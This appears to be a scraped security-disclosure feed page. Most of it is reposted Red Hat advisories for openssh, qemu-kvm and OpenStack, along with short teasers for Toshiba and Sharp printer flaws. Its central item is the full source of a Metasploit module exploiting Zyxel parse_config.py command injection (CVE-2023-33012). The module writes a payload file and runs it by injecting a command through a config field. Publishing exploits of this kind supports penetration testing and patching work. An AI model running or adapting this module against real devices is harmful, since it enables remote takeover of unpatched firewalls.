103 models of Toshiba Multi-Function Printers (MFP) are vulnerable to 40 different vulnerabilities including remote code execution, local privilege escalation, xml injection, and more.

Toshiba Multi-Function Printers 40 Vulnerabilities

This Metasploit module exploits vulnerabilities in multiple Zyxel devices including the VPN, USG and APT series. The affected firmware versions depend on the device module, see this module's documentation for more details.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = NormalRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Zyxel parse_config.py Command Injection',        'Description' => %q{          This module exploits vulnerabilities in multiple Zyxel devices including the VPN, USG and APT series.          The affected firmware versions depend on the device module, see this module's documentation for more details.          Note this module was unable to be tested against a real Zyxel device and was tested against a mock environment.          If you run into any issues testing this in a real environment we kindly ask you raise an issue in          metasploit's github repository: https://github.com/rapid7/metasploit-framework/issues/new/choose        },        'Author' => [          'SSD Secure Disclosure technical team', # discovery          'jheysel-r7' # Msf module        ],        'References' => [          [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-zyxel-vpn-series-pre-auth-remote-command-execution/'],          [ 'CVE', '2023-33012']        ],        'License' => MSF_LICENSE,        'Platform' => ['linux', 'unix'],        'Privileged' => true,        'Arch' => [ ARCH_CMD ],        'Targets' => [          [ 'Automatic Target', {}]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2024-01-24',        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ],          'Reliability' => [ ] # This vulnerability can only be exploited once, more info: https://vulncheck.com/blog/zyxel-cve-2023-33012#you-get-one-shot        }      )    )    register_options(      [        OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ]),      ]    )  end  def check    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'ext-js', 'app', 'common', 'zld_product_spec.js')    })    return CheckCode::Unknown('No response from /ext-js/app/common/zld_product_spec.js') if res.nil?    if res.code == 200      product_match = res.body.match(/ZLDSYSPARM_PRODUCT_NAME1="([^"]*)"/)      version_match = res.body.match(/ZLDCONFIG_CLOUD_HELP_VERSION=([\d.]+)/)      if product_match && version_match        product = product_match[1]        version = version_match[1]        if (product.starts_with?('USG') && product.include?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.10')) ||           (product.starts_with?('USG') && !product.include?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.00')) ||           (product.starts_with?('ATP') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.10')) ||           (product.starts_with?('VPN') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.00'))          return CheckCode::Appears("Product: #{product}, Version: #{version}")        else          return CheckCode::Safe("Product: #{product}, Version: #{version}")        end      end    end    CheckCode::Unknown('Version and product info were unable to be determined.')  end  def on_new_session(session)    super    command_output = ''    # Get the most recently created GRE tunnel interface, bring it down then delete it to allow for subsequent module runs.    if session.type.to_s.eql? 'meterpreter'      newest_gre = session.sys.process.execute '/bin/sh', "-c \"ip -d link show type gre | grep -oP '^\\d+: \\K[^@]+' | tail -n 1\""      print_good("Found the most recently created GRE tunnel interface: #{newest_gre}. Going to delete it to allow for subsequent module runs.")      command_output = session.sys.process.execute '/bin/sh', "-c \"ifconfig #{newest_gre} down && ip tunnel del #{newest_gre} mode gre && echo success\""    elsif session.type.to_s.eql? 'shell'      newest_gre = session.shell_command_token "ip -d link show type gre | grep -oP '^\\d+: \\K[^@]+' | tail -n 1"      print_good("Found the most recently created GRE tunnel interface: #{newest_gre}. Going to delete it to allow for subsequent module runs.")      command_output = session.shell_command_token "ifconfig #{newest_gre} down && ip tunnel del #{newest_gre} mode gre && echo success"    end    if command_output.include?('success')      print_good('The GRE interface was successfully removed.')    else      print_warning('The module failed to remove the GRE interface created by this exploit. Subsequent module runs will likely fail unless unless it\'s successfully removed')    end  end  def exploit    # Command injection has a 0x14 byte length limit so keep the file name as small as possible.    # The length limit is also why we leverage the arbitrary file write -> write our payload to the .qrs file then execute it with the command injection.    filename = rand_text_alpha(1)    payload_filepath = "#{datastore['WRITABLE_DIR']}/#{filename}.qsr"    command = payload.raw    command += ' '    command += <<~CMD      2>/var/log/ztplog 1>/var/log/ztplog      (sleep 10 && /bin/rm -rf #{payload_filepath}) &    CMD    command = "echo #{Rex::Text.encode_base64(command)} | base64 -d > #{payload_filepath} ; . #{payload_filepath}"    file_write_pload = "option proto vti\n"    file_write_pload += "option #{command};exit\n"    file_write_pload += "option name 1\n"    config = Base64.strict_encode64(file_write_pload)    data = { 'config' => config, 'fqdn' => "\x00" }    print_status('Attempting to upload the payload via QSR file write...')    file_write_res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'),      'data' => data.to_s    })    unless file_write_res && !file_write_res.body.include?('ParseError: 0xC0DE0005')      fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful')    end    register_files_for_cleanup(payload_filepath)    print_good("File write was successful, uploaded: #{payload_filepath}")    cmd_injection_pload = "option proto gre\n"    cmd_injection_pload += "option name 0\n"    cmd_injection_pload += "option ipaddr ;. #{payload_filepath};\n"    cmd_injection_pload += "option netmask 24\n"    cmd_injection_pload += "option gateway 0\n"    cmd_injection_pload += "option localip #{Faker::Internet.private_ip_v4_address}\n"    cmd_injection_pload += "option remoteip #{Faker::Internet.private_ip_v4_address}\n"    config = Rex::Text.encode_base64(cmd_injection_pload)    data = { 'config' => config, 'fqdn' => "\x00" }    cmd_injection_res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'),      'data' => data.to_s    })    # If the payload being used is for example cmd/unix/generic and not a payload spawning any kind of handler (bind or reverse)    # we can query the /ztp/cgi-bin/dumpztplog.py for the stdout of the command and print it for the user.    if payload_instance.connection_type == 'none'      cmd_output_res = send_request_cgi({        'method' => 'GET',        'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'dumpztplog.py')      })      if cmd_output_res&.body && !cmd_output_res.body.empty?        output = cmd_output_res.body.split("</head>\n<body>")[1]        output = output.split("</body>\n</html>")[0]        output = output.gsub("\n\n<br>", '')        output = output.gsub("[IPC]IPC result: 1\n", '')        print_good("Command output: #{output}")      else        print_error("Could not retrieve the command's stout from /ztp/cgi-bin/dumpztplog.py")      end    end    unless cmd_injection_res && !cmd_injection_res.body.include?('ParseError: 0xC0DE0005')      fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful')    end  endend

Zyxel parse_config.py Command Injection

308 different models of Sharp Multi-Function Printers (MFP) are vulnerable to 18 different vulnerabilities including remote code execution, local file inclusion, credential disclosure, and more.

Sharp Multi-Function Printer 18 Vulnerabilities

Red Hat Security Advisory 2024-4312-03 - An update for openssh is now available for Red Hat Enterprise Linux 9. Issues addressed include a code execution vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4312.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: openssh security updateAdvisory ID:        RHSA-2024:4312-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4312Issue date:         2024-07-03Revision:           03CVE Names:          CVE-2024-6387====================================================================Summary: An update for openssh is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:OpenSSH is an SSH protocol implementation supported by a number of Linux, UNIX, and similar operating systems. It includes the core files necessary for both the OpenSSH client and server.Security Fix(es):* openssh: Possible remote code execution due to a race condition in signal handling (CVE-2024-6387)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6387References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2294604

Red Hat Security Advisory 2024-4312-03

Red Hat Security Advisory 2024-4278-03 - An update for qemu-kvm is now available for Red Hat Enterprise Linux 9.4 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4278.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: qemu-kvm security updateAdvisory ID:        RHSA-2024:4278-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4278Issue date:         2024-07-02Revision:           03CVE Names:          CVE-2024-4467====================================================================Summary: An update for qemu-kvm is now available for Red Hat Enterprise Linux 9.4Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Kernel-based Virtual Machine (KVM) is a full virtualization solution for Linux on a variety of architectures. The qemu-kvm packages provide the user-space component for running virtual machines that use KVM.Security Fix(es):* qemu-kvm: QEMU: 'qemu-img info' leads to host file read/write (CVE-2024-4467)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-4467References:https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2024-4278-03

Red Hat Security Advisory 2024-4277-03 - An update for qemu-kvm is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4277.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: qemu-kvm security updateAdvisory ID:        RHSA-2024:4277-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4277Issue date:         2024-07-02Revision:           03CVE Names:          CVE-2024-4467====================================================================Summary: An update for qemu-kvm is now available for Red Hat Enterprise Linux 9.2Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Kernel-based Virtual Machine (KVM) is a full virtualization solution for Linux on a variety of architectures. The qemu-kvm packages provide the user-space component for running virtual machines that use KVM.Security Fix(es):* qemu-kvm: QEMU: 'qemu-img info' leads to host file read/write (CVE-2024-4467)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-4467References:https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2024-4277-03

Red Hat Security Advisory 2024-4276-03 - An update for qemu-kvm is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4276.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: qemu-kvm security updateAdvisory ID:        RHSA-2024:4276-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4276Issue date:         2024-07-02Revision:           03CVE Names:          CVE-2024-4467====================================================================Summary: An update for qemu-kvm is now available for Red Hat Enterprise Linux 9.0Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Kernel-based Virtual Machine (KVM) is a full virtualization solution for Linux on a variety of architectures. The qemu-kvm packages provide the user-space component for running virtual machines that use KVM.Security Fix(es):* qemu-kvm: QEMU: 'qemu-img info' leads to host file read/write (CVE-2024-4467)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-4467References:https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2024-4276-03

Red Hat Security Advisory 2024-4274-03 - An update for openstack-nova is now available for Red Hat OpenStack Platform 17.1.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4274.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Critical: Red Hat OpenStack Platform 17.1.3 (openstack-nova) security updateAdvisory ID:        RHSA-2024:4274-03Product:            Red Hat OpenStack PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4274Issue date:         2024-07-02Revision:           03CVE Names:          CVE-2024-32498====================================================================Summary: An update for openstack-nova is now available for Red Hat OpenStackPlatform 17.1 (Wallaby).Red Hat Product Security has rated this update as having a security impactof Critical. A Common Vulnerability Scoring System (CVSS) base score, whichgives a detailed severity rating, is available for each vulnerability fromthe CVE link(s) in the References section.Description:OpenStack Compute (codename Nova) is open source software designedto provision and manage large networks of virtual machines,creating aredundant and scalable cloud computing platform. It gives you the software,control panels, and APIs required to orchestrate a cloud, including runninginstances, managing networks, and controlling access through users andprojects.OpenStack Compute strives to be both hardware and hypervisoragnostic, currently supporting a variety of standard hardwareconfigurations and seven major hypervisors.Security Fix(es):* CVE-2024-32498 OpenStack: malicious qcow2/vmdk images(CVE-2024-32498)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-32498References:https://access.redhat.com/security/updates/classification/#criticalhttps://bugzilla.redhat.com/show_bug.cgi?id=2278663

Red Hat Security Advisory 2024-4274-03

Red Hat Security Advisory 2024-4273-03 - An update for openstack-cinder, openstack-glance, and openstack-nova is now available for Red Hat OpenStack Platform 16.2.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4273.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Critical: Red Hat OpenStack Platform 16.2.6 security updateAdvisory ID:        RHSA-2024:4273-03Product:            Red Hat OpenStack PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4273Issue date:         2024-07-02Revision:           03CVE Names:          CVE-2024-32498====================================================================Summary: An update for openstack-cinder, openstack-glance, and openstack-nova is nowavailable for Red Hat OpenStack Platform 16.2 (Train).Red Hat Product Security has rated this update as having a security impactof Critical. A Common Vulnerability Scoring System (CVSS) base score, whichgives a detailed severity rating, is available for each vulnerability fromthe CVE link(s) in the References section.Description:Cinder is the replacement of nova-volume in Folsom and beyond, use d forblock storage.OpenStack Image Service (code-named Glance) providesdiscovery,registration, and delivery services for virtual disk images. TheImage Service API server provides a standard REST interface for queryinginformation about virtual disk images stored in a variety of back-endstores, including OpenStack Object Storage. Clients can register newvirtual disk images with the Image Service, query for information onpublicly available disk images, and use the Image Service's client libraryfor streaming virtual disk images.OpenStack Compute (codename Nova) is open source software designedto provision and manage large networks of virtual machines,creating aredundant and scalable cloud computing platform. It gives you the software,control panels, and APIs required to orchestrate a cloud, including runninginstances, managing networks, and controlling access through users andprojects.OpenStack Compute strives to be both hardware and hypervisoragnostic, currently supporting a variety of standard hardwareconfigurations and seven major hypervisors.Security Fix(es):* CVE-2024-32498 OpenStack: malicious qcow2/vmdk images(CVE-2024-32498)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-32498References:https://access.redhat.com/security/updates/classification/#criticalhttps://bugzilla.redhat.com/show_bug.cgi?id=2278663

Red Hat Security Advisory 2024-4273-03

Red Hat Security Advisory 2024-4272-03 - An update for openstack-nova, openstack-glance, and openstack-cinder is now available for Red Hat OpenStack Platform 17.1.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4272.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Critical: Red Hat OpenStack Platform 17.1.3 security updateAdvisory ID:        RHSA-2024:4272-03Product:            Red Hat OpenStack PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4272Issue date:         2024-07-02Revision:           03CVE Names:          CVE-2024-32498====================================================================Summary: An update for openstack-nova, openstack-glance, and openstack-cinder is nowavailable for Red Hat OpenStack Platform 17.1 (Wallaby).Red Hat Product Security has rated this update as having a security impactof Critical. A Common Vulnerability Scoring System (CVSS) base score, whichgives a detailed severity rating, is available for each vulnerability fromthe CVE link(s) in the References section.Description:Cinder is the replacement of nova-volume in Folsom and beyond, use d forblock storage.OpenStack Image Service (code-named Glance) providesdiscovery,registration, and delivery services for virtual disk images. TheImage Service API server provides a standard REST interface for queryinginformation about virtual disk images stored in a variety of back-endstores, including OpenStack Object Storage. Clients can register newvirtual disk images with the Image Service, query for information onpublicly available disk images, and use the Image Service's client libraryfor streaming virtual disk images.OpenStack Compute (codename Nova) is open source software designedto provision and manage large networks of virtual machines,creating aredundant and scalable cloud computing platform. It gives you the software,control panels, and APIs required to orchestrate a cloud, including runninginstances, managing networks, and controlling access through users andprojects.OpenStack Compute strives to be both hardware and hypervisoragnostic, currently supporting a variety of standard hardwareconfigurations and seven major hypervisors.Security Fix(es):* CVE-2024-32498 OpenStack: malicious qcow2/vmdk images(CVE-2024-32498)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-32498References:https://access.redhat.com/security/updates/classification/#criticalhttps://bugzilla.redhat.com/show_bug.cgi?id=2278663

Tag

#js